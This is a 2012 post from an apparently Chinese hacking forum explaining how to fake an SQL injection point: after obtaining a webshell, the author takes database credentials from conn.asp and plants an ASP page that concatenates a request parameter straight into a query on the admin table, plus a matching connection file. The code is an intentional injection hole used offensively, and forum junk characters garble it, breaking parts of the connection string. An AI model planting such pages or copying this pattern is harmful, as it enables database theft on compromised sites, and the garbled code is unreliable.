中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
- R$ c' z0 y' ?2 \  ^6 u+ PASP/Visual Basic代码  A$ r4 ?3 Y. [+ `
<!--#include file="xx.asp"-->    1 A  M5 l" S3 r1 R3 r
<%   
% ]4 H6 a+ G) g2 X- m( ~set rs=server.createobject("ADODB.recordset")   
( ^( C" h7 g2 O, [: p. s4 N" eid = request("id")    # s& o" g) o/ C2 x4 E
strSQL = "select * from admin where id=" & id    ; [5 C" s$ \* u+ d
rs.open strSQL,conn,1,3   
0 [9 T. I& O+ P2 y7 o/ Jrs.close    % k6 R% g3 \4 D
%>  & ]2 C, c( J" D% ], b8 R
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
% m% S$ v& P7 A: L( ^然后就要构造一个连接数据库的文件了,代码如下:
6 I/ M8 J9 E5 ~ASP/Visual Basic代码
$ h  h4 h' f# G4 _3 I+ W<%            9 y/ T" H2 m. q0 h1 n
strSQLServerName = "000.000.000.000"     '服务器名称或地址    , r. [( X" f7 N, p9 I% u0 s- v) w
strSQLDBUserName = "sqlname"         '数据库帐号    ; f2 n) G0 T% ?; M
strSQLDBPassword = "sqlpass"         '数据库密码   
, F0 T6 n2 _  r. K3 b* TstrSQLDBName = "sqldataname"           '数据库名称    % Z# t- n6 g* k6 L
Set conn = Server.CreateObject("ADODB.Connection")   
7 E% W" H+ K0 A# Y+ G. TstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   
% [8 I- V. f6 K) econn.open strCon    5 c9 _* J9 Z. P" Q) ~8 j% W
%>  3 D4 F! M/ M7 m. O
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功) \$ Z! q# J) U# P- k, u0 ]2 P





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2